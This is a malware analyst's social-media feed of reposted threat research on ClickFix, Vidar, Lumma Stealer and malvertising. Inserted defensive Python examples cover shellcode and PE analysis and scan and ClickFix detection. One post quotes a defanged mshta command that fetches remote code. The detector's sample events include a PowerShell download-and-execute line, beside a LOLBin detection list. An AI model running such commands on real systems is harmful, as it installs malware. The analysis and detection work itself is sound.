ExecuteMalware
executemalware.bsky.social
Malware analyst
Reposted by ExecuteMalware
My first blog with Proofpoint is live! And we love a good crossover. State-sponsored actors try their hand at ClickFix - the hottest thing in cybercrime. Meet the North Koreans, Iranians, and Russians who are upping their social engineering game www.proofpoint.com/us/blog/thre...
Around the World in 90 Days: State-Sponsored Actors Try ClickFix | Proofpoint US
Key Findings While primarily a technique affiliated with cybercriminal actors, Proofpoint researchers discovered state-sponsored actors in multiple campaigns using the ClickFix social
www.proofpoint.com
April 17, 2025 at 11:12 AM
Reposted by ExecuteMalware
I took a look at a new malware loader which uses steganography within WAV 🌊 files to deliver its payload on an endpoint. Enjoy!

www.youtube.com/watch?v=NiNI...
I found MALWARE inside of MUSIC! (Octowave Steganography Malware Analysis)
YouTube video by Jai Minton - CyberRaiju
www.youtube.com
March 4, 2025 at 10:26 AM
Reposted by ExecuteMalware
⌛ This series will take you through installing WinDbg and configuring Binary Ninja to use the WinDbg engine to create and use TTD traces. It will also show you how to capture TTD traces and replay them in Binary Ninja 👇
Getting Started with Time-Travel Debugging in Binary Ninja
This series will take you through installing WinDbg and configuring Binary Ninja to use the WinDbg engine to create and use TTD traces. It will also show you...
buff.ly
February 6, 2025 at 6:42 PM
Reposted by ExecuteMalware
Note: The C2 for this infection has been identified as Lumma Stealer instead of Vidar:

- threatfox.abuse.ch/ioc/1405142/
February 6, 2025 at 3:45 PM
Reposted by ExecuteMalware
2025-02-05 (Wednesday): #ClearFake / #ClickFix style fake CAPTCHA leads to possible #Vidar.

Vidar C2 using eteherealpath[.]top behind Cloudflare.

Details at github.com/malware-traf...
February 6, 2025 at 1:03 AM
Reposted by ExecuteMalware
With Trump's win, crypto's price is booming. But beware. @g0njxa.bsky.social and @russianpanda.bsky.social have done a massive investigation into how an organised criminal group is trying to steal #bitcoin and other #cryptocurrency with infostealer malware. #infosec trac-labs.com/hearts-stole...
Hearts Stolen, Wallets Emptied: Insights into CryptoLove Traffer’s Team
Insights into CryptoLove traffer’s team operation. Let’s dive in…
trac-labs.com
December 1, 2024 at 9:34 AM
Reposted by ExecuteMalware
2025-02-04 (Tuesday): From a #ClickFix style fake CAPTCHA, I got a copy/paste command for:

mshta hxxp[:]//80.64.30[.]238/evix.xll

Ran it and ended up with HTTPS C2 traffic to stchkr[.]rest which was reported as a #Vidar domain yesterday on ThreatFox.

threatfox.abuse.ch/ioc/1402588/
February 4, 2025 at 11:34 PM
Reposted by ExecuteMalware
2025-01-30 (Thursday): #XLoader infection. Unlike my previous XLoader infections, this one didn't run in my VM, so I used a physical host. A #pcap of the infection traffic, the associated malware samples, and more info is available at malware-traffic-analysis.net/2025/01/30/i...
January 30, 2025 at 6:32 PM
Reposted by ExecuteMalware
📣 New video drop - in this video I discuss ways to detect shellcode entry point using properties of position independence. Nothing advanced but a helpful technique when you lack context on the shellcode 👇
Analyzing Shellcode - Finding the Entry Point Based Off Position Independence
Sometimes you'll discover shellcode, but not have the time or ability to determine its entry point. In this video, we'll explore a technique using common she...
buff.ly
January 30, 2025 at 7:00 PM
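Added example, not the video's own method: 32-bit x86 shellcode cannot assume its load address, so it almost always starts with a "GetPC" idiom that leaks EIP into a register. Scanning a blob for those idioms gives a short list of candidate entry points to try in an emulator or debugger. The sample blobs are constructed, and the three idioms below are the ones assumed worth checking first; x64 shellcode uses RIP-relative addressing and usually needs no GetPC, so this scanner is for 32-bit code only.

```python
"""Find candidate shellcode entry points from position-independence idioms.

Added example, not the video's own method. Sample blobs are constructed.
"""
import re

# Classic x86 GetPC forms (assumed as the idioms worth checking first):
#   call $+5 ; pop reg                          E8 00 00 00 00  58..5F
#   fld<const> ; fnstenv [esp-0xC] ; pop reg    D9 E8..EE  D9 74 24 F4  58..5F
#   jmp short L2 ; L1: pop reg ; ... ; L2: call L1   (matched procedurally below)
PATTERNS = {
    "call-pop": re.compile(rb"\xE8\x00\x00\x00\x00[\x58-\x5F]"),
    "fnstenv-pop": re.compile(rb"\xD9[\xE8-\xEE]\xD9\x74\x24\xF4[\x58-\x5F]"),
}


def _jmp_call_pop(sc: bytes) -> list:
    """Locate jmp/call/pop: a short jmp whose target is a CALL back to the
    byte right after the jmp, where a POP collects the pushed return address."""
    hits = []
    for i in range(len(sc) - 1):
        if sc[i] != 0xEB:
            continue
        rel8 = sc[i + 1] - 0x100 if sc[i + 1] >= 0x80 else sc[i + 1]
        tgt = i + 2 + rel8                        # expected CALL instruction
        if not 0 <= tgt <= len(sc) - 5 or sc[tgt] != 0xE8:
            continue
        rel32 = int.from_bytes(sc[tgt + 1:tgt + 5], "little", signed=True)
        ret = tgt + 5 + rel32                     # where the CALL returns to
        if ret == i + 2 and ret < len(sc) and 0x58 <= sc[ret] <= 0x5F:
            hits.append({"offset": i, "kind": "jmp-call-pop", "pc_reg_pop": ret})
    return hits


def find_getpc(sc: bytes) -> list:
    """Return every GetPC idiom found, sorted by offset. Each hit's 'offset'
    is the idiom's first instruction, i.e. a candidate entry point, and
    'pc_reg_pop' is the POP that ends up holding the address."""
    hits = []
    for kind, pat in PATTERNS.items():
        for m in pat.finditer(sc):
            hits.append({"offset": m.start(), "kind": kind, "pc_reg_pop": m.end() - 1})
    hits += _jmp_call_pop(sc)
    return sorted(hits, key=lambda h: h["offset"])


def guess_entry(sc: bytes):
    """Lowest-offset idiom (this naturally skips a leading NOP sled); None if
    nothing matched. Verify by emulating from the returned offset."""
    hits = find_getpc(sc)
    return hits[0]["offset"] if hits else None


# Constructed samples (not real shellcode)
SAMPLE_CALL_POP = b"\x90" * 4 + b"\xE8\x00\x00\x00\x00\x5E" + b"\x83\xC6\x0B"   # call $+5; pop esi; add esi,0xB
SAMPLE_FNSTENV = b"\xD9\xEE\xD9\x74\x24\xF4\x5B" + b"\x83\xC3\x10"               # fldz; fnstenv [esp-0xC]; pop ebx
SAMPLE_JMP_CALL_POP = (
    b"\x90" * 8                         # 0:  NOP sled
    + b"\xEB\x05"                       # 8:  jmp short +5  -> offset 15
    + b"\x5B"                           # 10: pop ebx       (return address lands here)
    + b"\x31\xC0\x90\x90"               # 11: filler
    + b"\xE8\xF6\xFF\xFF\xFF"           # 15: call -10      -> offset 10
    + b"\xCC" * 4
)
SAMPLE_NONE = bytes(range(0x40, 0x50))  # contains no idiom

if __name__ == "__main__":
    for name, blob in [("call-pop", SAMPLE_CALL_POP), ("fnstenv", SAMPLE_FNSTENV),
                       ("jmp-call-pop", SAMPLE_JMP_CALL_POP), ("none", SAMPLE_NONE)]:
        print(name, find_getpc(blob), "entry guess:", guess_entry(blob))
```

A hit is a starting point, not proof: decoder stubs sometimes sit behind a few unrelated instructions, and a blob with no idiom may simply resolve its imports by other means, so confirm the guess by emulating or single-stepping from that offset.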
Reposted by ExecuteMalware
No live streams this week so why not learn more about the PE file format?! This video discusses the AddressOfEntryPoint and techniques for finding main in tools such as IDA Pro 👇

https://buff.ly/4haGIDu

Need more PE (and who doesn't)? Give this playlist a view:

https://buff.ly/4aO0lz3
The AddressOfEntryPoint and Tips for Finding Main
The PE file format defines the entry point for execution through the AddressOfEntryPoint field. However, it's not as straight-forward as it may seem. In this...
buff.ly
January 27, 2025 at 4:00 PM
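Added example, not code from the video or the original post: a minimal PE parser that reads AddressOfEntryPoint, finds the section header that contains it, and converts the RVA to a raw file offset, warning when the entry point lands in a non-executable section, in virtual-only space with no bytes on disk, or outside every section (all of which are worth a second look in a malware sample). The PE32 image it parses is constructed in memory so the block runs offline; its layout and values are assumptions.

```python
"""Read AddressOfEntryPoint from a PE image and map it to a file offset.

Added example, not from the video or the original post. The PE32 image is
constructed in memory; section layout and values are assumptions.
"""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
SECTION_HDR = "<8sIIIIIIHHI"        # 40-byte IMAGE_SECTION_HEADER


def build_sample_pe(entry_rva: int) -> bytes:
    """Construct a minimal PE32 with a .text and a .data section (sample data)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                   # PE32 optional header size
    # IMAGE_FILE_HEADER: i386, 2 sections, no symbols, EXECUTABLE_IMAGE|32BIT_MACHINE
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)         # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)           # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)            # FileAlignment
    secs = [
        # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics
        (b".text", 0x100, 0x1000, 0x200, 0x200, 0x60000020),  # CODE|EXECUTE|READ
        (b".data", 0x100, 0x2000, 0x200, 0x400, 0xC0000040),  # INITIALIZED_DATA|READ|WRITE
    ]
    hdrs = b"".join(struct.pack(SECTION_HDR, n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in secs)
    headers = dos + b"PE\0\0" + coff + bytes(opt) + hdrs
    headers += b"\x00" * (0x200 - len(headers))       # pad headers to FileAlignment
    text = bytearray(0x200)
    text[0x10:0x15] = b"\x55\x8B\xEC\x33\xC0"         # push ebp; mov ebp,esp; xor eax,eax
    return headers + bytes(text) + bytes(0x200)


def locate_entry_point(pe: bytes) -> dict:
    """Parse the headers, find the section holding AddressOfEntryPoint and
    convert the RVA to a raw file offset, flagging suspicious placements."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff_off = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff_off)
    opt_off = coff_off + 20
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    if magic not in (0x10B, 0x20B):                   # PE32 / PE32+
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    entry_rva = struct.unpack_from("<I", pe, opt_off + 16)[0]   # same offset in PE32 and PE32+
    result = {"entry_rva": entry_rva, "section": None, "file_offset": None,
              "executable": False, "warnings": []}
    if entry_rva == 0:
        result["warnings"].append("AddressOfEntryPoint is 0 (DLL with no entry, or tampered)")
        return result
    sec_off = opt_off + opt_size
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, pe, sec_off + i * 40)
        span = max(vsize, rawsize)                    # some linkers leave VirtualSize 0
        if va <= entry_rva < va + span:
            result["section"] = name.rstrip(b"\0").decode("ascii", "replace")
            result["executable"] = bool(chars & IMAGE_SCN_MEM_EXECUTE)
            delta = entry_rva - va
            if delta < rawsize:                       # backed by bytes on disk
                result["file_offset"] = rawptr + delta
            else:                                     # virtual-only, zero-filled at load
                result["warnings"].append("entry point maps to no raw bytes on disk")
            if not result["executable"]:
                result["warnings"].append("entry point in a non-executable section")
            break
    else:
        result["warnings"].append("entry point outside every section header")
    return result


if __name__ == "__main__":
    for rva in (0x1010, 0x2020, 0x9000):
        print(hex(rva), locate_entry_point(build_sample_pe(rva)))
```

The file offset is what you seek to in a hex editor or hand to a disassembler when the tool's auto-analysis has not found the entry; the warnings cover the cases where that offset is meaningless or where a packer has pointed the entry somewhere unusual.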
Reposted by ExecuteMalware
🦔 📹 New Video: Binary Refinery deobfuscation of a LummaStealer loader (PowerShell, JScript)

www.youtube.com/watch?v=kHU_...
#MalwareAnalysisForHedgehogs #PowerShell #JScript
Malware Analysis - Binary Refinery URL extraction of Multi-Layered PoshLoader for LummaStealer
YouTube video by MalwareAnalysisForHedgehogs
www.youtube.com
January 27, 2025 at 4:23 AM
Reposted by ExecuteMalware
A fairly sizable distributed port scan (all source port 19000) about 30 minutes ago; raw logs and sources here:

gist.github.com/silence-is-b...
January 24, 2025 at 5:16 PM
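Added example, not the gist's own data or tooling: a fixed source port across many sources is a cheap fingerprint for a distributed scan, because several scanner frameworks send every probe from one hard-coded port. Grouping flow records by source port and counting distinct sources and distinct destination ports exposes the cluster even when each source sends only a few packets. The flow records are constructed (assumed format: "ts src sport dst dport" per line, RFC 5737 addresses).

```python
"""Spot a distributed scan whose probes share one fixed source port.

Added example, not from the gist. Flow records are constructed.
"""
from collections import defaultdict


def parse_flows(lines):
    """Parse 'ts src sport dst dport' records; blank and '#' lines are skipped."""
    flows = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((ts, src, int(sport), dst, int(dport)))
    return flows


def source_port_clusters(flows, min_sources=3, min_dports=3):
    """Return {sport: summary} for source ports used by at least min_sources
    distinct sources against at least min_dports distinct destination ports."""
    by_sport = defaultdict(lambda: {"sources": set(), "dports": set(), "packets": 0})
    for _, src, sport, _, dport in flows:
        bucket = by_sport[sport]
        bucket["sources"].add(src)
        bucket["dports"].add(dport)
        bucket["packets"] += 1
    return {
        sp: {"sources": sorted(b["sources"]), "dports": sorted(b["dports"]),
             "packets": b["packets"]}
        for sp, b in by_sport.items()
        if len(b["sources"]) >= min_sources and len(b["dports"]) >= min_dports
    }


# Constructed flow records: five sources all using sport 19000, plus normal
# traffic from ephemeral ports (two clients happen to share 49877).
SAMPLE_FLOWS = """\
# ts                  src            sport  dst          dport
2025-01-24T16:45:01Z  198.51.100.11  19000  203.0.113.5  22
2025-01-24T16:45:01Z  198.51.100.12  19000  203.0.113.5  80
2025-01-24T16:45:02Z  198.51.100.13  19000  203.0.113.5  443
2025-01-24T16:45:02Z  198.51.100.14  19000  203.0.113.5  8080
2025-01-24T16:45:03Z  198.51.100.15  19000  203.0.113.5  3389
2025-01-24T16:45:03Z  198.51.100.11  19000  203.0.113.5  8443
2025-01-24T16:45:04Z  192.0.2.7      51234  203.0.113.5  443
2025-01-24T16:45:04Z  192.0.2.8      49877  203.0.113.5  443
2025-01-24T16:45:05Z  192.0.2.9      49877  203.0.113.5  443
""".splitlines()

if __name__ == "__main__":
    for sport, summary in source_port_clusters(parse_flows(SAMPLE_FLOWS)).items():
        print(sport, summary)
```

Before blocking on the result, check that the clustered sources are not your own NAT or load-balancer egress, which can also reuse one source port legitimately.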
Reposted by ExecuteMalware
2025-01-22 (Wednesday): #TrafficAnalysisExercise: Download from fake software site.

I've posted a traffic analysis exercise based on the same type of #Malvertizing I wrote about for my employer at github.com/PaloAltoNetw...

The exercise #pcap is at www.malware-traffic-analysis.net/2025/01/22/i...
January 23, 2025 at 6:36 PM
Reposted by ExecuteMalware
New episode of DISCARDED! Featuring Kristina Walter, Chief of the NSA's Cybersecurity Collaboration Center. It was a fantastic conversation.
Apple: podcasts.apple.com/us/podcast/d...
Spotify: open.spotify.com/episode/0Ont...
Web: www.proofpoint.com/us/podcasts/...
The Power of Partnerships: An Interview with the NSA’s Kristina Walter
Podcast Episode · DISCARDED: Tales From the Threat Research Trenches · 01/22/2025 · 40m
podcasts.apple.com
January 23, 2025 at 5:47 PM
Reposted by ExecuteMalware
📣 New Year, New Episode - check out the latest episode of the Behind the Binary podcast! Stephen Eckels joins us to talk about game hacking/modding, discovering the Sunburst backdoor, getting into reverse engineering and much more!

🎧
EP04 Stephen Eckels - A Journey From Game Modding to SolarWinds: How One Gamer Became a Renowned Reverse Engineer
Behind the Binary by Google Cloud Security · Episode
buff.ly
January 15, 2025 at 6:04 PM
Reposted by ExecuteMalware
Takedown Services Manager Hannah Rapetti helps Proofpoint customers address malicious web domains that are targeting their company.

In this video, she highlights tactics employed by threat actors to trick users into thinking the content is legitimate.

Stream the full episode: ow.ly/vXoP50UGz5e.
January 15, 2025 at 4:40 PM
Reposted by ExecuteMalware
🚀 Learning tools such as IDA Pro and Ghidra starts with understanding assembly. One of my latest courses on Pluralsight will teach you the basics of the assembly language to get started 👇

https://buff.ly/3Pz2wfZ

Or you can check out this 24 video playlist on YouTube:

https://buff.ly/4jfR72c
Malware Analysis: Assembly Basics
Learning tools such as IDA Pro and Ghidra starts with understanding assembly. This course will teach you the basics of the assembly language to get started as a reverse engineer!
buff.ly
January 15, 2025 at 4:00 PM
Reposted by ExecuteMalware
Imagine for a moment that Google allowed a sponsored link to a phishing site for Google ads...

www.malwarebytes.com/blog/news/20...

#GoogleSearch #GoogleAds #malvertising #phishing
The great Google Ads heist: criminals ransack advertiser accounts via fake Google ads
An ongoing malvertising campaign steals Google advertiser accounts via fraudulent ads for Google Ads itself.
www.malwarebytes.com
January 15, 2025 at 1:55 PM
Reposted by ExecuteMalware
2025-01-13 (Mon): Something I wrote for my employer: Legitimate websites infected with #KongTuke script present CAPTCHA-style pages that ask victims to paste #PowerShell script into a Run window. Lately, this has led to infections abusing the #BOINC platform. More info at: github.com/PaloAltoNetw...
January 14, 2025 at 6:49 PM
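Added example, not code from this post, the 2025-02-04 mshta post above, or the linked write-ups: a small detection over process-creation events for the "paste this into the Run window" step both posts describe. A command pasted into the Windows Run dialog is spawned by explorer.exe, so the resulting chain looks like explorer.exe launching mshta or PowerShell with a remote URL or a download/decode cue in the command line. The events are constructed in a simplified key=value form (assumption: one process-creation event per line, RFC 5737 addresses rather than the posts' IOCs), not real Sysmon output.

```python
"""Flag ClickFix / KongTuke-style "paste this into Run" executions.

Added example, not from either post. Events are constructed key=value
lines, not real Sysmon output.
"""
import re

LOLBINS = {
    "mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe",
    "certutil.exe", "msiexec.exe", "wscript.exe", "cscript.exe",
    "rundll32.exe", "regsvr32.exe", "bitsadmin.exe",
}
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
URL_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)          # http(s) URL or UNC path
CUE_RE = re.compile(
    r"\b(iex|irm|iwr|invoke-expression|invoke-webrequest|downloadstring|"
    r"frombase64string)\b|\s-e(nc|c|ncodedcommand)?\s", re.I)


def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {k: q if q else u for k, q, u in KV_RE.findall(line)}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: dict) -> list:
    """Reasons this event matches the ClickFix pattern (empty list = no match)."""
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent", ""))
    cmd = ev.get("cmd", "")
    reasons = []
    if image in LOLBINS and parent == "explorer.exe":
        reasons.append(f"{image} spawned directly by explorer.exe (Run dialog / shell)")
    if URL_RE.search(cmd):
        reasons.append("remote resource in command line")
    if CUE_RE.search(cmd):
        reasons.append("download/decode cue in command line")
    return reasons


def find_clickfix(lines) -> list:
    """Alert only when the explorer -> LOLBin chain is paired with a remote
    resource or a download cue; either signal on its own is too noisy."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if any("explorer.exe" in r for r in reasons) and len(reasons) >= 2:
            alerts.append({"ts": ev.get("ts"), "image": _basename(ev.get("image", "")),
                           "reasons": reasons})
    return alerts


# Constructed sample events (not the IOCs from the posts)
SAMPLE_EVENTS = [
    r'ts=2025-02-04T22:10:01Z image=C:\Windows\System32\mshta.exe parent=C:\Windows\explorer.exe cmd="mshta http://192.0.2.10/update.xll"',
    r'ts=2025-02-04T22:10:05Z image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe cmd="powershell -w hidden -c iex(irm http://192.0.2.20/a.txt)"',
    r'ts=2025-02-04T22:11:00Z image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parent=C:\Windows\explorer.exe cmd="powershell Get-Date"',
    r'ts=2025-02-04T22:12:00Z image=C:\Windows\System32\mshta.exe parent="C:\Program Files\Setup\setup.exe" cmd="mshta http://192.0.2.30/page.hta"',
    r'ts=2025-02-04T22:13:00Z image=C:\Windows\notepad.exe parent=C:\Windows\explorer.exe cmd="notepad C:\Users\a\notes.txt"',
]

if __name__ == "__main__":
    for alert in find_clickfix(SAMPLE_EVENTS):
        print(alert)
```

The explorer.exe parent is the distinguishing feature of the Run-dialog path; the same LOLBins launched by an installer or a scheduled task need a different rule, which is why the fourth sample event is deliberately not alerted on here.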
Reposted by ExecuteMalware
🎉 Only a few weeks left until our new features and authentication launch! Here’s a reminder of what to expect: ✨
NEW capabilities, including:

✅ False-positive lists to refine your searches
✅ URLhaus hunting tools for deeper insights
✅ And so much more!

1/2
January 9, 2025 at 2:13 PM
Reposted by ExecuteMalware
☠️ If learning malware analysis/reverse engineering skills is on your 2025 to do list, you're in luck! I've created a live stream series called Malware Mondays to help you get started 👇

https://buff.ly/4j5KZtq

Sessions are independent but can be viewed consecutively to enhance abilities!
Malware Mondays
Share your videos with friends, family, and the world
buff.ly
January 9, 2025 at 2:40 PM
Reposted by ExecuteMalware
#opendir at:

https:// superior-somalia-bs-leisure.trycloudflare\.com ->
http:// jsnybsafva\.biz:8030
January 9, 2025 at 2:52 PM